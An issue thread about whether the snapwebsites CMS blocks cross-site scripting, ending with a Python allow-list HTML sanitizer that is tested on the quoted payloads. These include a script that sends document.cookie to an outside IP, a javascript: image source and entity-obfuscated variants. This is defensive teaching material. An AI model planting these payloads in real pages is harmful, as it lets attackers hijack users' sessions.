Open shujaatak opened 5 years ago
It depends on what you mean by sanitization. We use XML to build the DOM, so it is clean in that sense at least. We try to xmllint all XML files at compile time. However, dynamic data (i.e. when you edit a page) would not be checked that way. It still needs to be valid XML at some point. We verify various things in such input to avoid potential problems (such as entity bombs).
I mean, is there an XSS guard built into snapwebsites? How does snapwebsites remove XSS threats from the dynamic data?
Dynamic data can only be HTML and images. XSS is created with JavaScript. I'm not going to say that it's 100% certain that there is no such vector, but I do not know of one and we have been paying attention to those things.
Of course, if you're the administrator, you're more likely to be able to do such things. So protecting your administrator account is important.
Let's suppose a user writes the following code in an article/comment:
<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>
which essentially hijacks the session cookie.
Or
<IMG SRC=jAvascript:alert('test2')>
etc.
Now the question arises: can such XSS attacks be avoided using snapwebsites?
The <script> tag is not allowed unless you have enough permissions to add it.
I'd have to test the image tag to make sure.
Note that the A part would not matter. We use a DOM and when you do an obj.attr(), the entity will be parsed as expected.
I wonder if snapwebsites has a built-in HTML sanitization feature, or how one can achieve this?
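The approach described in the thread (build a DOM from the untrusted markup, allow only known tags, and inspect attribute values after entity decoding rather than pattern-matching the raw text) can be shown in a small allow-list sanitizer. The following is an added example written for this page, not code from snapwebsites; it uses Python's standard-library HTML parser in place of the project's XML DOM, and the tag, attribute and URL-scheme policy is a hypothetical one for a non-admin author. The two payloads from the question above are fed through it, together with two constructed obfuscated variants ("&#106;avascript:" and "java&#9;script:") that a raw-text filter would miss but a parsed attribute value exposes.

```python
"""Allow-list HTML sanitizer built on a parsed (DOM-style) event stream.

Added example, stdlib only; not code from snapwebsites. Untrusted markup is
parsed rather than regex-matched, only allow-listed tags/attributes survive,
and URL-bearing attributes are checked *after* entity decoding, so
"jAvascript:" and "&#106;avascript:" are caught the same way.
"""
import re
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical policy for an ordinary (non-admin) author: tag -> allowed attributes.
ALLOWED_TAGS = {
    "p": set(), "b": set(), "i": set(), "em": set(), "strong": set(),
    "br": set(), "ul": set(), "ol": set(), "li": set(),
    "a": {"href", "title"},
    "img": {"src", "alt", "width", "height"},
}
VOID_TAGS = {"br", "img"}                       # never emitted with a closing tag
URL_ATTRS = {"href", "src"}
ALLOWED_SCHEMES = {"http", "https", "mailto"}   # javascript:, data:, vbscript: are out
DROP_CONTENT_TAGS = {"script", "style"}         # tag *and* its content are removed

# Browsers ignore control characters and whitespace inside a URL scheme
# ("java\tscript:"), so strip them before deciding what the scheme is.
_CONTROL_WS = re.compile(r"[\x00-\x20\x7f]")


def safe_url(value):
    """True if an already entity-decoded URL is relative or uses an allowed scheme."""
    scheme = urlsplit(_CONTROL_WS.sub("", value)).scheme.lower()
    return scheme == "" or scheme in ALLOWED_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        # convert_charrefs=True: text arrives decoded, and we re-escape it on output
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []          # open allowed tags, so the output is always balanced
        self.dropping = None     # name of the <script>/<style> we are currently inside

    def handle_starttag(self, tag, attrs):
        if self.dropping:
            return
        if tag in DROP_CONTENT_TAGS:
            self.dropping = tag
            return
        if tag not in ALLOWED_TAGS:
            return               # unknown tag: drop the tag, keep its text content
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_TAGS[tag]:
                continue         # on*=, style=, etc. are never allow-listed
            value = value or ""  # HTMLParser has already decoded entities here
            if name in URL_ATTRS and not safe_url(value):
                continue         # e.g. src=jAvascript:..., href=&#106;avascript:...
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_endtag(self, tag):
        if self.dropping:
            if tag == self.dropping:
                self.dropping = None
            return
        if tag in self.stack:    # close everything opened since this tag
            while True:
                open_tag = self.stack.pop()
                self.out.append("</%s>" % open_tag)
                if open_tag == tag:
                    break

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data, quote=False))

    # comments, doctype and processing instructions keep the no-op defaults: dropped

    def finish(self):
        self.close()             # flush any buffered text
        while self.stack:        # close whatever the author left open
            self.out.append("</%s>" % self.stack.pop())
        return "".join(self.out)


def sanitize(html):
    s = Sanitizer()
    s.feed(html)
    return s.finish()


if __name__ == "__main__":
    # Inputs: the two payloads from the thread plus constructed obfuscated variants.
    for payload in (
        '<script>new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;</script>',
        "<IMG SRC=jAvascript:alert('test2')>",
        '<a href="&#106;avascript:alert(1)">x</a>',
        '<img src="java&#9;script:alert(1)">',
        '<a href="https://example.com/?a=1&amp;b=2" onclick="evil()">ok</a>',
    ):
        print(repr(sanitize(payload)))
```

The decisive detail is the order of operations: the parser decodes entities in attribute values before `safe_url` ever sees them, which is what makes an entity-encoded "javascript:" behave exactly like the plain one. Checking the raw text first would let the encoded form through.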